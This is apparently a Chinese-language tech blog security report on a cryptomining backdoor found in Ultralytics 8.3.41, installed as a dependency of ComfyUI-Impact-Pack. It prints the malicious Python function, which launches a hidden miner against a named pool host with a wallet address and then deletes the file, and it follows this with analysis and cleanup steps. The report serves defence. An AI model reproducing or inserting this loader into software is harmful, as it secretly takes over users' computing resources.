潛在加密貨幣挖礦攻擊報告:ComfyUI 與 Ultralytics 的安全問題

概要描述

近期在使用 ComfyUI 搭配 ComfyUI-Impact-Pack 擴展時,發現疑似未經授權的加密貨幣挖礦行為。問題來源為 Ultralytics 套件中的一段惡意 Python 程式碼,該程式碼試圖使用系統資源進行未經許可的挖礦操作。

潛在加密貨幣挖礦攻擊報告:ComfyUI 與 Ultralytics 的安全問題

問題描述

這次事件涉及到安裝於以下路徑中的下載模組 (downloads.py): 你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils

惡意程式碼片段

以下是檢測到的惡意程式碼:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

行為分析

  1. 權限變更:使用 os.chmod 令檔案可執行。
  2. 執行惡意命令:連接至礦池伺服器 connect.consrensys.com:8080
  3. 隱藏過程:壓制標準輸入、輸出和錯誤流,避免被察覺。
  4. 刪除檔案:執行後刪除檔案以掩蓋證據。

風險評估

潛在影響

  • 高系統資源占用:挖礦行為會顯著增加 CPU/GPU 的使用率。
  • 硬體損耗:長期高負載可能縮短硬體壽命。
  • 安全隱患:可能危及系統的敏感資料或整體安全性。

問題來源

該惡意行為與 Ultralytics 套件的可疑版本有關,該版本似乎作為 ComfyUI-Impact-Pack 的自動依賴項被安裝。

安裝路徑

  • 可疑套件:Ultralytics 版本 8.3.41
  • 位置你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics

啟動源

可能由 ComfyUI-Impact-Pack 中的 install.py 腳本觸發,該腳本會自動安裝依賴項。


網路行為分析

目標網域

  • 網域名稱connect.consrensys.com
  • 通訊埠:8080
  • 用途:懷疑為礦池伺服器的終端點,可能使用 Stratum 協議進行挖礦。

證據

  • 腳本中明確指定的礦池連接細節。
  • 使用私密金鑰(如 4BHRQHF...)表明有活躍的挖礦帳戶或操作。

推薦處置措施

  1. 卸載可疑套件
    pip uninstall ultralytics ultralytics-thop
    
  2. 移除 ComfyUI-Impact-Pack 刪除相關目錄:
    ./ComfyUI/custom_nodes/ComfyUI-Impact-Pack
    
  3. 掃描系統 使用防毒軟體和惡意程式檢測工具,確保沒有持續的威脅。

  4. 檢查網路連接 確認是否有到 connect.consrensys.com 的外部連接,並在防火牆中封鎖。

  5. 提高意識 將該報告提交給 ComfyUI 和 Ultralytics 的維護者,以防止進一步濫用。

附加證據

相關細節

  • 程式碼位置你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
  • 行為模式:未經授權的檔案執行、礦池連接、及證據清理。
  • 觸發條件:ComfyUI-Impact-Pack 自動安裝依賴項。

資料來源

結論

此次事件表明開源專案中的依賴項審查不足可能導致使用者系統遭到惡意攻擊。建議開源社群實施更嚴格的審核機制以保護最終用戶。


Share on:
Previous: 語音合成新時代:Fish Speech 1.5 推出五種新語言,實現即時無縫對話!
Next: World Labs:AI生成3D互動世界的新革命
DMflow.chat

DMflow.chat

廣告

一站整合多平台聊天,智能溝通新體驗!支援 Facebook、Instagram、Telegram、LINE 和網站,內建 ChatGPT 與 Gemini 模型。提供歷史記錄保存、推播通知、行銷活動和客服轉接等強大功能,助您全方位提升效率與互動!

Deep Research:ChatGPT 革命性研究功能全面解析
3 February 2025

Deep Research:ChatGPT 革命性研究功能全面解析

Deep Research:ChatGPT 革命性研究功能全面解析 引言:AI 研究助理的新紀元 在當今快速發展的科技世界中,資訊獲取和深度研究變得越來越重要。OpenAI 推出的 D...

OpenAI 最新推出 o3-mini 模型:高效能 AI 的新里程碑
1 February 2025

OpenAI 最新推出 o3-mini 模型:高效能 AI 的新里程碑

OpenAI 最新推出 o3-mini 模型:高效能 AI 的新里程碑 OpenAI 於 2025 年1月底推出最新一代的小型 AI 模型 - o3-mini,這款模型不僅延續了前代產品...

川普「星際之門」AI基建計畫:軟銀、OpenAI 豪擲5000億美元,能否改寫全球科技版圖?
24 January 2025

川普「星際之門」AI基建計畫:軟銀、OpenAI 豪擲5000億美元,能否改寫全球科技版圖?

星際之門 AI 專案:軟銀助力,打造 OpenAI 專屬的未來人工智慧引擎 美國總統川普於2025年1月21日宣布啟動史上最大規模AI基礎設施計畫「星際之門」(Stargate),初期投...

OpenAI推出Operator:AI代理自動化網頁任務
24 January 2025

OpenAI推出Operator:AI代理自動化網頁任務

OpenAI推出Operator:AI代理自動化網頁任務 OpenAI 最新推出名為「Operator」的 AI 代理,它能夠像人類一樣使用瀏覽器完成各種網頁任務,從訂購雜貨到預訂行程,...

OpenAI ChatGPT 免費版大升級:全新 o3-mini 模型登場,付費用戶獨享更多優勢!
24 January 2025

OpenAI ChatGPT 免費版大升級:全新 o3-mini 模型登場,付費用戶獨享更多優勢!

OpenAI ChatGPT 免費版大升級:全新 o3-mini 模型登場,付費用戶獨享更多優勢! OpenAI 宣布 ChatGPT 免費版將升級至全新 o3-mini 模型,提供更快...

Anthropic 最新 Citations API:讓 Claude 回應更可靠、更透明
24 January 2025

Anthropic 最新 Citations API:讓 Claude 回應更可靠、更透明

Anthropic 最新 Citations API:讓 Claude 回應更可靠、更透明 探索 Anthropic 最新推出的 Citations API,這項功能讓 Claude A...

OpenAI Day2: 強化學習微調與模型自訂:未來 AI 的新趨勢
7 December 2024

OpenAI Day2: 強化學習微調與模型自訂:未來 AI 的新趨勢

OpenAI Day2: 強化學習微調與模型自訂:未來 AI 的新趨勢 描述 探索 OpenAI 最新的「強化學習微調 (Reinforcement Fine-Tuning, RFT)」技術,...

OpenAI ChatGPT 免費版大升級:全新 o3-mini 模型登場,付費用戶獨享更多優勢!
24 January 2025

OpenAI ChatGPT 免費版大升級:全新 o3-mini 模型登場,付費用戶獨享更多優勢!

OpenAI ChatGPT 免費版大升級:全新 o3-mini 模型登場,付費用戶獨享更多優勢! OpenAI 宣布 ChatGPT 免費版將升級至全新 o3-mini 模型,提供更快...

Pika 2.0推出場景控制新功能,正面迎戰OpenAI的Sora
20 December 2024

Pika 2.0推出場景控制新功能,正面迎戰OpenAI的Sora

Pika 2.0推出場景控制新功能,正面迎戰OpenAI的Sora 突破性的AI影片生成工具Pika發布2.0版本,為創作者帶來更強大的場景控制功能與客製化選項,震撼AI影片生成市場。 ...